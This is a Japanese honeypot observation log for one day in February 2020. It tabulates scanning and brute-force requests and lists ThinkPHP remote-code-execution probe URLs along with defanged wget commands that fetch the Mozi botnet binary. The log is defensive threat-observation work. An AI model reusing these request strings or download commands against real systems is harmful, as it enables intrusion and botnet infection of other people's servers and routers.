WOWHoneypot観察(339日目)
2020/02/20(木)
トータルは310件でした。
ハンティングログは以下です。
222.247.248[.]187 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
180.115.37[.]105 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
件数 | 概要 | リクエスト |
---|---|---|
158 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
37 | WordPressに対するブルートフォース攻撃 | GET /wp-login.php |
36 | WordPressに対するブルートフォース攻撃 | POST /wp-login.php |
31 | アクセス | GET / |
21 | 調査 | GET /is_test |
2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
2 | Gponルータの脆弱性を狙った通信 | POST /GponForm/diag_Form?images/ |
2 | phpMyAdminの調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
2 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | phpunitの脆弱性を狙った通信 | POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | Solrの調査 | GET /solr/admin/info/system?wt=json |
1 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
1 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
1 | 調査 | GET /logs |
1 | ThinkPHPの脆弱性を狙った通信 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP |
1 | GET /editConfig?returnUrl=/ | |
1 | GET /ReportServer | |
1 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
1 | ThinkCMFの脆弱性を狙った通信 | GET /?a=fetch&content= |
1 | リモートデバッグの調査 | GET /?XDEBUG_SESSION_START=phpstorm |
1 | WordPressの調査 | GET ///wp-json/wp/v2/users/ |
1 | WordPressの調査 | GET ///?author=1 |